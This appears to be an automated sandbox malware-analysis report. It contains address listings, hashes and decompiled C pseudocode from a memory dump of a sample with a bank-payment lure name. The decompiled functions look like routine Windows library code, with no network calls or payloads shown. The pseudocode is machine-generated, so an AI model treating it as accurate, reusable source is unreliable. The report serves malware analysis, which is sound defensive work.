                                                                    0x018a854a
                                                                    0x018a854d
                                                                    0x018a8551
                                                                    0x018a876e
                                                                    0x018a8778
                                                                    0x018a877b
                                                                    0x018a8780
                                                                    0x018a8557
                                                                    0x018a8557
                                                                    0x018a855d
                                                                    0x018a855d
                                                                    0x018a856b
                                                                    0x018a856e
                                                                    0x018a8570
                                                                    0x018a8573
                                                                    0x018a8576
                                                                    0x018a8576
                                                                    0x018a8579
                                                                    0x018a857b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018a8581
                                                                    0x018a85a0
                                                                    0x018a85a2
                                                                    0x018a85a5
                                                                    0x018a85a7
                                                                    0x018f9b1b
                                                                    0x018f9b1b
                                                                    0x018a862e
                                                                    0x018a862e
                                                                    0x018a8631
                                                                    0x018a8631
                                                                    0x018a8634
                                                                    0x018a8636
                                                                    0x018a8669
                                                                    0x018a8669
                                                                    0x018a866b
                                                                    0x018f9bbf
                                                                    0x018f9bc4
                                                                    0x018f9bc8
                                                                    0x018f9bce
                                                                    0x018f9bce
                                                                    0x018a8671
                                                                    0x018a8671
                                                                    0x018a8674
                                                                    0x018a8676
                                                                    0x018f9bae
                                                                    0x018f9bae
                                                                    0x018a8676
                                                                    0x018a867c
                                                                    0x018a867e
                                                                    0x018a8688
                                                                    0x018a8688
                                                                    0x00000000
                                                                    0x018a867e
                                                                    0x018a8638
                                                                    0x018a8638
                                                                    0x018a863b
                                                                    0x018a863e
                                                                    0x018a863f
                                                                    0x018a8642
                                                                    0x018a8645
                                                                    0x018a8648
                                                                    0x018a864d
                                                                    0x018f9b69
                                                                    0x018f9b6e
                                                                    0x018f9b7b
                                                                    0x018f9b81
                                                                    0x018f9b85
                                                                    0x018f9b89
                                                                    0x018f9ba7
                                                                    0x018f9b8b
                                                                    0x018f9b91
                                                                    0x018f9b9a
                                                                    0x018f9b9f
                                                                    0x018f9b9f
                                                                    0x018a8788
                                                                    0x018a878d
                                                                    0x018a8763
                                                                    0x018a8763
                                                                    0x018a8766
                                                                    0x00000000
                                                                    0x018a8766
                                                                    0x018f9b70
                                                                    0x00000000
                                                                    0x018f9b70
                                                                    0x018a8656
                                                                    0x018a865a
                                                                    0x018a865c
                                                                    0x018a8752
                                                                    0x018a8756
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018a875e
                                                                    0x00000000
                                                                    0x018a875e
                                                                    0x018a8662
                                                                    0x018a8662
                                                                    0x018a8662
                                                                    0x018a8666
                                                                    0x00000000
                                                                    0x018a8666
                                                                    0x018a85b7
                                                                    0x018a85b9
                                                                    0x018a85bc
                                                                    0x018a85bf
                                                                    0x018a85cc
                                                                    0x018a85d1
                                                                    0x018a85d4
                                                                    0x018a85db
                                                                    0x018a85de
                                                                    0x018a85e0
                                                                    0x018f9b5f
                                                                    0x00000000
                                                                    0x018f9b5f
                                                                    0x018a85e6
                                                                    0x018a85ea
                                                                    0x018a86c3
                                                                    0x018a86c5
                                                                    0x018a86c8
                                                                    0x018a86ca
                                                                    0x018f9b16
                                                                    0x00000000
                                                                    0x018f9b16
                                                                    0x018a86d6
                                                                    0x018a85f6
                                                                    0x018a85f6
                                                                    0x018a85f9
                                                                    0x018a8602
                                                                    0x018a8606
                                                                    0x018a860a
                                                                    0x018a860b
                                                                    0x018a860e
                                                                    0x018a8611
                                                                    0x00000000
                                                                    0x018a8611
                                                                    0x018a85f3
                                                                    0x00000000
                                                                    0x018a85f3
                                                                    0x018a8619
                                                                    0x018a861e
                                                                    0x018a861e
                                                                    0x018a8621
                                                                    0x018a8622
                                                                    0x018a8623
                                                                    0x018a8625
                                                                    0x018a862c
                                                                    0x00000000
                                                                    0x018a873d
                                                                    0x00000000
                                                                    0x018a873d
                                                                    0x018a8737
                                                                    0x018a850f
                                                                    0x018a8512
                                                                    0x00000000
                                                                    0x018a8512
                                                                    0x00000000
                                                                    0x018a84d6

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 47c1dcdcc6e3ad8819cfa33ed24c0915d563c495ef7737ae592792326df2bb56
                                                                    • Instruction ID: 07f9e367f116ed228e04ed7b6d5cea0f87c5c5740390724625784638da8e2c2f
                                                                    • Opcode Fuzzy Hash: 47c1dcdcc6e3ad8819cfa33ed24c0915d563c495ef7737ae592792326df2bb56
                                                                    • Instruction Fuzzy Hash: 0FB15B70E04209DFEB19DFE9C984AADBBB5BF49308F50412DE605EB345D770AA45CB60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 67%
                                                                    			E0189C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                                                                    				signed int _v8;
                                                                    				char _v1036;
                                                                    				signed int _v1040;
                                                                    				char _v1048;
                                                                    				signed int _v1052;
                                                                    				signed char _v1056;
                                                                    				void* _v1058;
                                                                    				char _v1060;
                                                                    				signed int _v1064;
                                                                    				void* _v1068;
                                                                    				intOrPtr _v1072;
                                                                    				void* _v1084;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				intOrPtr _t70;
                                                                    				intOrPtr _t72;
                                                                    				signed int _t74;
                                                                    				intOrPtr _t77;
                                                                    				signed int _t78;
                                                                    				signed int _t81;
                                                                    				void* _t101;
                                                                    				signed int _t102;
                                                                    				signed int _t107;
                                                                    				signed int _t109;
                                                                    				signed int _t110;
                                                                    				signed char _t111;
                                                                    				signed int _t112;
                                                                    				signed int _t113;
                                                                    				signed int _t114;
                                                                    				intOrPtr _t116;
                                                                    				void* _t117;
                                                                    				char _t118;
                                                                    				void* _t120;
                                                                    				char _t121;
                                                                    				signed int _t122;
                                                                    				signed int _t123;
                                                                    				signed int _t125;
                                                                    
                                                                    				_t125 = (_t123 & 0xfffffff8) - 0x424;
                                                                    				_v8 =  *0x198d360 ^ _t125;
                                                                    				_t116 = _a4;
                                                                    				_v1056 = _a16;
                                                                    				_v1040 = _a24;
                                                                    				if(E018A6D30( &_v1048, _a8) < 0) {
                                                                    					L4:
                                                                    					_pop(_t117);
                                                                    					_pop(_t120);
                                                                    					_pop(_t101);
                                                                    					return E018DB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                                                                    				}
                                                                    				_t70 = _a20;
                                                                    				if(_t70 >= 0x3f4) {
                                                                    					_t121 = _t70 + 0xc;
                                                                    					L19:
                                                                    					_t107 =  *( *[fs:0x30] + 0x18);
                                                                    					__eflags = _t107;
                                                                    					if(_t107 == 0) {
                                                                    						L60:
                                                                    						_t68 = 0xc0000017;
                                                                    						goto L4;
                                                                    					}
                                                                    					_t72 =  *0x1987b9c; // 0x0
                                                                    					_t74 = L018B4620(_t107, _t107, _t72 + 0x180000, _t121);
                                                                    					_v1064 = _t74;
                                                                    					__eflags = _t74;
                                                                    					if(_t74 == 0) {
                                                                    						goto L60;
                                                                    					}
                                                                    					_t102 = _t74;
                                                                    					_push( &_v1060);
                                                                    					_push(_t121);
                                                                    					_push(_t74);
                                                                    					_push(2);
                                                                    					_push( &_v1048);
                                                                    					_push(_t116);
                                                                    					_t122 = E018D9650();
                                                                    					__eflags = _t122;
                                                                    					if(_t122 >= 0) {
                                                                    						L7:
                                                                    						_t114 = _a12;
                                                                    						__eflags = _t114;
                                                                    						if(_t114 != 0) {
                                                                    							_t77 = _a20;
                                                                    							L26:
                                                                    							_t109 =  *(_t102 + 4);
                                                                    							__eflags = _t109 - 3;
                                                                    							if(_t109 == 3) {
                                                                    								L55:
                                                                    								__eflags = _t114 - _t109;
                                                                    								if(_t114 != _t109) {
                                                                    									L59:
                                                                    									_t122 = 0xc0000024;
                                                                    									L15:
                                                                    									_t78 = _v1052;
                                                                    									__eflags = _t78;
                                                                    									if(_t78 != 0) {
                                                                    										L018B77F0( *( *[fs:0x30] + 0x18), 0, _t78);
                                                                    									}
                                                                    									_t68 = _t122;
                                                                    									goto L4;
                                                                    								}
                                                                    								_t110 = _v1056;
                                                                    								_t118 =  *((intOrPtr*)(_t102 + 8));
                                                                    								_v1060 = _t118;
                                                                    								__eflags = _t110;
                                                                    								if(_t110 == 0) {
                                                                    									L10:
                                                                    									_t122 = 0x80000005;
                                                                    									L11:
                                                                    									_t81 = _v1040;
                                                                    									__eflags = _t81;
                                                                    									if(_t81 == 0) {
                                                                    										goto L15;
                                                                    									}
                                                                    									__eflags = _t122;
                                                                    									if(_t122 >= 0) {
                                                                    										L14:
                                                                    										 *_t81 = _t118;
                                                                    										goto L15;
                                                                    									}
                                                                    									__eflags = _t122 - 0x80000005;
                                                                    									if(_t122 != 0x80000005) {
                                                                    										goto L15;
                                                                    									}
                                                                    									goto L14;
                                                                    								}
                                                                    								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                                                                    								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                                                                    									goto L10;
                                                                    								}
                                                                    								_push( *((intOrPtr*)(_t102 + 8)));
                                                                    								_t59 = _t102 + 0xc; // 0xc
                                                                    								_push(_t110);
                                                                    								L54:
                                                                    								E018DF3E0();
                                                                    								_t125 = _t125 + 0xc;
                                                                    								goto L11;
                                                                    							}
                                                                    							__eflags = _t109 - 7;
                                                                    							if(_t109 == 7) {
                                                                    								goto L55;
                                                                    							}
                                                                    							_t118 = 4;
                                                                    							__eflags = _t109 - _t118;
                                                                    							if(_t109 != _t118) {
                                                                    								__eflags = _t109 - 0xb;
                                                                    								if(_t109 != 0xb) {
                                                                    									__eflags = _t109 - 1;
                                                                    									if(_t109 == 1) {
                                                                    										__eflags = _t114 - _t118;
                                                                    										if(_t114 != _t118) {
                                                                    											_t118 =  *((intOrPtr*)(_t102 + 8));
                                                                    											_v1060 = _t118;
                                                                    											__eflags = _t118 - _t77;
                                                                    											if(_t118 > _t77) {
                                                                    												goto L10;
                                                                    											}
                                                                    											_push(_t118);
                                                                    											_t56 = _t102 + 0xc; // 0xc
                                                                    											_push(_v1056);
                                                                    											goto L54;
                                                                    										}
                                                                    										__eflags = _t77 - _t118;
                                                                    										if(_t77 != _t118) {
                                                                    											L34:
                                                                    											_t122 = 0xc0000004;
                                                                    											goto L15;
                                                                    										}
                                                                    										_t111 = _v1056;
                                                                    										__eflags = _t111 & 0x00000003;
                                                                    										if((_t111 & 0x00000003) == 0) {
                                                                    											_v1060 = _t118;
                                                                    											__eflags = _t111;
                                                                    											if(__eflags == 0) {
                                                                    												goto L10;
                                                                    											}
                                                                    											_t42 = _t102 + 0xc; // 0xc
                                                                    											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                                                                    											_v1048 =  *((intOrPtr*)(_t102 + 8));
                                                                    											_push(_t111);
                                                                    											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                                                                    											_push(0);
                                                                    											_push( &_v1048);
                                                                    											_t122 = E018D13C0(_t102, _t118, _t122, __eflags);
                                                                    											L44:
                                                                    											_t118 = _v1072;
                                                                    											goto L11;
                                                                    										}
                                                                    										_t122 = 0x80000002;
                                                                    										goto L15;
                                                                    									}
                                                                    									_t122 = 0xc0000024;
                                                                    									goto L44;
                                                                    								}
                                                                    								__eflags = _t114 - _t109;
                                                                    								if(_t114 != _t109) {
                                                                    									goto L59;
                                                                    								}
                                                                    								_t118 = 8;
                                                                    								__eflags = _t77 - _t118;
                                                                    								if(_t77 != _t118) {
                                                                    									goto L34;
                                                                    								}
                                                                    								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                                    								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                                    									goto L34;
                                                                    								}
                                                                    								_t112 = _v1056;
                                                                    								_v1060 = _t118;
                                                                    								__eflags = _t112;
                                                                    								if(_t112 == 0) {
                                                                    									goto L10;
                                                                    								}
                                                                    								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                                                                    								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                                                                    								goto L11;
                                                                    							}
                                                                    							__eflags = _t114 - _t118;
                                                                    							if(_t114 != _t118) {
                                                                    								goto L59;
                                                                    							}
                                                                    							__eflags = _t77 - _t118;
                                                                    							if(_t77 != _t118) {
                                                                    								goto L34;
                                                                    							}
                                                                    							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                                    							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                                    								goto L34;
                                                                    							}
                                                                    							_t113 = _v1056;
                                                                    							_v1060 = _t118;
                                                                    							__eflags = _t113;
                                                                    							if(_t113 == 0) {
                                                                    								goto L10;
                                                                    							}
                                                                    							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                                                                    							goto L11;
                                                                    						}
                                                                    						_t118 =  *((intOrPtr*)(_t102 + 8));
                                                                    						__eflags = _t118 - _a20;
                                                                    						if(_t118 <= _a20) {
                                                                    							_t114 =  *(_t102 + 4);
                                                                    							_t77 = _t118;
                                                                    							goto L26;
                                                                    						}
                                                                    						_v1060 = _t118;
                                                                    						goto L10;
                                                                    					}
                                                                    					__eflags = _t122 - 0x80000005;
                                                                    					if(_t122 != 0x80000005) {
                                                                    						goto L15;
                                                                    					}
                                                                    					L018B77F0( *( *[fs:0x30] + 0x18), 0, _t102);
                                                                    					L18:
                                                                    					_t121 = _v1060;
                                                                    					goto L19;
                                                                    				}
                                                                    				_push( &_v1060);
                                                                    				_push(0x400);
                                                                    				_t102 =  &_v1036;
                                                                    				_push(_t102);
                                                                    				_push(2);
                                                                    				_push( &_v1048);
                                                                    				_push(_t116);
                                                                    				_t122 = E018D9650();
                                                                    				if(_t122 >= 0) {
                                                                    					__eflags = 0;
                                                                    					_v1052 = 0;
                                                                    					goto L7;
                                                                    				}
                                                                    				if(_t122 == 0x80000005) {
                                                                    					goto L18;
                                                                    				}
                                                                    				goto L4;
                                                                    			}










































                                                                    0x0189c608
                                                                    0x0189c615
                                                                    0x0189c625
                                                                    0x0189c62d
                                                                    0x0189c635
                                                                    0x0189c640
                                                                    0x0189c680
                                                                    0x0189c687
                                                                    0x0189c688
                                                                    0x0189c689
                                                                    0x0189c694
                                                                    0x0189c694
                                                                    0x0189c642
                                                                    0x0189c64a
                                                                    0x0189c697
                                                                    0x01907a25
                                                                    0x01907a2b
                                                                    0x01907a2e
                                                                    0x01907a30
                                                                    0x01907bea
                                                                    0x01907bea
                                                                    0x00000000
                                                                    0x01907bea
                                                                    0x01907a36
                                                                    0x01907a43
                                                                    0x01907a48
                                                                    0x01907a4c
                                                                    0x01907a4e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01907a58
                                                                    0x01907a5a
                                                                    0x01907a5b
                                                                    0x01907a5c
                                                                    0x01907a5d
                                                                    0x01907a63
                                                                    0x01907a64
                                                                    0x01907a6a
                                                                    0x01907a6c
                                                                    0x01907a6e
                                                                    0x019079cb
                                                                    0x019079cb
                                                                    0x019079ce
                                                                    0x019079d0
                                                                    0x01907a98
                                                                    0x01907a9b
                                                                    0x01907a9b
                                                                    0x01907a9e
                                                                    0x01907aa1
                                                                    0x01907bbe
                                                                    0x01907bbe
                                                                    0x01907bc0
                                                                    0x01907be0
                                                                    0x01907be0
                                                                    0x01907a01
                                                                    0x01907a01
                                                                    0x01907a05
                                                                    0x01907a07
                                                                    0x01907a15
                                                                    0x01907a15
                                                                    0x01907a1a
                                                                    0x00000000
                                                                    0x01907a1a
                                                                    0x01907bc2
                                                                    0x01907bc6
                                                                    0x01907bc9
                                                                    0x01907bcd
                                                                    0x01907bcf
                                                                    0x019079e6
                                                                    0x019079e6
                                                                    0x019079eb
                                                                    0x019079eb
                                                                    0x019079ef
                                                                    0x019079f1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x019079f3
                                                                    0x019079f5
                                                                    0x019079ff
                                                                    0x019079ff
                                                                    0x00000000
                                                                    0x019079ff
                                                                    0x019079f7
                                                                    0x019079fd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x019079fd
                                                                    0x01907bd5
                                                                    0x01907bd8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01907ba9
                                                                    0x01907bac
                                                                    0x01907bb0
                                                                    0x01907bb1
                                                                    0x01907bb1
                                                                    0x01907bb6
                                                                    0x00000000
                                                                    0x01907bb6
                                                                    0x01907aa7
                                                                    0x01907aaa
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01907ab2
                                                                    0x01907ab3
                                                                    0x01907ab5
                                                                    0x01907aec
                                                                    0x01907aef
                                                                    0x01907b25
                                                                    0x01907b28
                                                                    0x01907b62
                                                                    0x01907b64
                                                                    0x01907b8f
                                                                    0x01907b92
                                                                    0x01907b96
                                                                    0x01907b98
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01907b9e
                                                                    0x01907b9f
                                                                    0x01907ba3
                                                                    0x00000000
                                                                    0x01907ba3
                                                                    0x01907b66
                                                                    0x01907b68
                                                                    0x01907ae2
                                                                    0x01907ae2
                                                                    0x00000000
                                                                    0x01907ae2
                                                                    0x01907b6e
                                                                    0x01907b72
                                                                    0x01907b75
                                                                    0x01907b81
                                                                    0x01907b85
                                                                    0x01907b87
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01907b31
                                                                    0x01907b34
                                                                    0x01907b3c
                                                                    0x01907b45
                                                                    0x01907b46
                                                                    0x01907b4f
                                                                    0x01907b51
                                                                    0x01907b57
                                                                    0x01907b59
                                                                    0x01907b59
                                                                    0x00000000
                                                                    0x01907b59
                                                                    0x01907b77
                                                                    0x00000000
                                                                    0x01907b77
                                                                    0x01907b2a
                                                                    0x00000000
                                                                    0x01907b2a
                                                                    0x01907af1
                                                                    0x01907af3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01907afb
                                                                    0x01907afc
                                                                    0x01907afe
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01907b00
                                                                    0x01907b03
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01907b05
                                                                    0x01907b09
                                                                    0x01907b0d
                                                                    0x01907b0f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01907b18
                                                                    0x01907b1d
                                                                    0x00000000
                                                                    0x01907b1d
                                                                    0x01907ab7
                                                                    0x01907ab9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01907abf
                                                                    0x01907ac1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01907ac3
                                                                    0x01907ac6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01907ac8
                                                                    0x01907acc
                                                                    0x01907ad0
                                                                    0x01907ad2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01907adb
                                                                    0x00000000
                                                                    0x01907adb
                                                                    0x019079d6
                                                                    0x019079d9
                                                                    0x019079dc
                                                                    0x01907a91
                                                                    0x01907a94
                                                                    0x00000000
                                                                    0x01907a94
                                                                    0x019079e2
                                                                    0x00000000
                                                                    0x019079e2
                                                                    0x01907a74
                                                                    0x01907a7a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01907a8a
                                                                    0x01907a21
                                                                    0x01907a21
                                                                    0x00000000
                                                                    0x01907a21
                                                                    0x0189c650
                                                                    0x0189c651
                                                                    0x0189c656
                                                                    0x0189c65c
                                                                    0x0189c65d
                                                                    0x0189c663
                                                                    0x0189c664
                                                                    0x0189c66a
                                                                    0x0189c66e
                                                                    0x019079c5
                                                                    0x019079c7
                                                                    0x00000000
                                                                    0x019079c7
                                                                    0x0189c67a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a01df7905c54a64a7ecd50feb16af24a63d0cab8eda07b588a6f5cae2a4355f0
                                                                    • Instruction ID: 8d1d4d8d62a5d3625e3cd6eaf4c5a3164e34b5a462b365699cafddf5dd9e9f03
                                                                    • Opcode Fuzzy Hash: a01df7905c54a64a7ecd50feb16af24a63d0cab8eda07b588a6f5cae2a4355f0
                                                                    • Instruction Fuzzy Hash: 4C818275604605CFDB2BCE98C880E7A77E9FB84364F14481AEE999B281D330FD41C7A2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 79%
                                                                    			E01916DC9(signed int __ecx, void* __edx) {
                                                                    				unsigned int _v8;
                                                                    				intOrPtr _v12;
                                                                    				signed int _v16;
                                                                    				intOrPtr _v20;
                                                                    				intOrPtr _v24;
                                                                    				intOrPtr _v28;
                                                                    				char _v32;
                                                                    				char _v36;
                                                                    				char _v40;
                                                                    				char _v44;
                                                                    				char _v48;
                                                                    				char _v52;
                                                                    				char _v56;
                                                                    				char _v60;
                                                                    				void* _t87;
                                                                    				void* _t95;
                                                                    				signed char* _t96;
                                                                    				signed int _t107;
                                                                    				signed int _t136;
                                                                    				signed char* _t137;
                                                                    				void* _t157;
                                                                    				void* _t161;
                                                                    				void* _t167;
                                                                    				intOrPtr _t168;
                                                                    				void* _t174;
                                                                    				void* _t175;
                                                                    				signed int _t176;
                                                                    				void* _t177;
                                                                    
                                                                    				_t136 = __ecx;
                                                                    				_v44 = 0;
                                                                    				_t167 = __edx;
                                                                    				_v40 = 0;
                                                                    				_v36 = 0;
                                                                    				_v32 = 0;
                                                                    				_v60 = 0;
                                                                    				_v56 = 0;
                                                                    				_v52 = 0;
                                                                    				_v48 = 0;
                                                                    				_v16 = __ecx;
                                                                    				_t87 = L018B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                                                                    				_t175 = _t87;
                                                                    				if(_t175 != 0) {
                                                                    					_t11 = _t175 + 0x30; // 0x30
                                                                    					 *((short*)(_t175 + 6)) = 0x14d4;
                                                                    					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                                                                    					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                                                                    					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                                                                    					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                                                                    					E01916B4C(_t167, _t11, 0x214,  &_v8);
                                                                    					_v12 = _v8 + 0x10;
                                                                    					_t95 = E018B7D50();
                                                                    					_t137 = 0x7ffe0384;
                                                                    					if(_t95 == 0) {
                                                                    						_t96 = 0x7ffe0384;
                                                                    					} else {
                                                                    						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                    					}
                                                                    					_push(_t175);
                                                                    					_push(_v12);
                                                                    					_push(0x402);
                                                                    					_push( *_t96 & 0x000000ff);
                                                                    					E018D9AE0();
                                                                    					_t87 = L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                                                                    					_t176 = _v16;
                                                                    					if((_t176 & 0x00000100) != 0) {
                                                                    						_push( &_v36);
                                                                    						_t157 = 4;
                                                                    						_t87 = E0191795D( *((intOrPtr*)(_t167 + 8)), _t157);
                                                                    						if(_t87 >= 0) {
                                                                    							_v24 = E0191795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                                                                    							_v28 = E0191795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                                                                    							_push( &_v52);
                                                                    							_t161 = 5;
                                                                    							_t168 = E0191795D( *((intOrPtr*)(_t167 + 8)), _t161);
                                                                    							_v20 = _t168;
                                                                    							_t107 = L018B4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                                                                    							_v16 = _t107;
                                                                    							if(_t107 != 0) {
                                                                    								_v8 = _v8 & 0x00000000;
                                                                    								 *(_t107 + 0x20) = _t176;
                                                                    								 *((short*)(_t107 + 6)) = 0x14d5;
                                                                    								_t47 = _t107 + 0x24; // 0x24
                                                                    								_t177 = _t47;
                                                                    								E01916B4C( &_v36, _t177, 0xc78,  &_v8);
                                                                    								_t51 = _v8 + 4; // 0x4
                                                                    								_t178 = _t177 + (_v8 >> 1) * 2;
                                                                    								_v12 = _t51;
                                                                    								E01916B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                                    								_v12 = _v12 + _v8;
                                                                    								E01916B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                                    								_t125 = _v8;
                                                                    								_v12 = _v12 + _v8;
                                                                    								E01916B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                                                                    								_t174 = _v12 + _v8;
                                                                    								if(E018B7D50() != 0) {
                                                                    									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                    								}
                                                                    								_push(_v16);
                                                                    								_push(_t174);
                                                                    								_push(0x402);
                                                                    								_push( *_t137 & 0x000000ff);
                                                                    								E018D9AE0();
                                                                    								L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                                                                    								_t168 = _v20;
                                                                    							}
                                                                    							_t87 = L018B2400( &_v36);
                                                                    							if(_v24 >= 0) {
                                                                    								_t87 = L018B2400( &_v44);
                                                                    							}
                                                                    							if(_t168 >= 0) {
                                                                    								_t87 = L018B2400( &_v52);
                                                                    							}
                                                                    							if(_v28 >= 0) {
                                                                    								return L018B2400( &_v60);
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return _t87;
                                                                    			}































                                                                    0x01916dd4
                                                                    0x01916dde
                                                                    0x01916de1
                                                                    0x01916de3
                                                                    0x01916de6
                                                                    0x01916de9
                                                                    0x01916dec
                                                                    0x01916def
                                                                    0x01916df2
                                                                    0x01916df5
                                                                    0x01916dfe
                                                                    0x01916e04
                                                                    0x01916e09
                                                                    0x01916e0d
                                                                    0x01916e18
                                                                    0x01916e1b
                                                                    0x01916e22
                                                                    0x01916e2d
                                                                    0x01916e30
                                                                    0x01916e36
                                                                    0x01916e42
                                                                    0x01916e4d
                                                                    0x01916e50
                                                                    0x01916e55
                                                                    0x01916e5c
                                                                    0x01916e6e
                                                                    0x01916e5e
                                                                    0x01916e67
                                                                    0x01916e67
                                                                    0x01916e73
                                                                    0x01916e74
                                                                    0x01916e77
                                                                    0x01916e7c
                                                                    0x01916e7d
                                                                    0x01916e8e
                                                                    0x01916e93
                                                                    0x01916e9c
                                                                    0x01916ea8
                                                                    0x01916eab
                                                                    0x01916eac
                                                                    0x01916eb3
                                                                    0x01916ecd
                                                                    0x01916edc
                                                                    0x01916ee2
                                                                    0x01916ee5
                                                                    0x01916ef2
                                                                    0x01916efb
                                                                    0x01916f01
                                                                    0x01916f06
                                                                    0x01916f0b
                                                                    0x01916f11
                                                                    0x01916f1a
                                                                    0x01916f22
                                                                    0x01916f26
                                                                    0x01916f26
                                                                    0x01916f33
                                                                    0x01916f41
                                                                    0x01916f44
                                                                    0x01916f47
                                                                    0x01916f54
                                                                    0x01916f65
                                                                    0x01916f77
                                                                    0x01916f7c
                                                                    0x01916f82
                                                                    0x01916f91
                                                                    0x01916f99
                                                                    0x01916fa3
                                                                    0x01916fae
                                                                    0x01916fae
                                                                    0x01916fba
                                                                    0x01916fbb
                                                                    0x01916fbc
                                                                    0x01916fc1
                                                                    0x01916fc2
                                                                    0x01916fd3
                                                                    0x01916fd8
                                                                    0x01916fd8
                                                                    0x01916fdf
                                                                    0x01916fe8
                                                                    0x01916fee
                                                                    0x01916fee
                                                                    0x01916ff5
                                                                    0x01916ffb
                                                                    0x01916ffb
                                                                    0x01917004
                                                                    0x00000000
                                                                    0x0191700a
                                                                    0x01917004
                                                                    0x01916eb3
                                                                    0x01916e9c
                                                                    0x01917015

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                    • Instruction ID: 7ed92999b465b1f0e7c4f1e1b592b2a3f736c1bbffe12191c408a3996d137c29
                                                                    • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
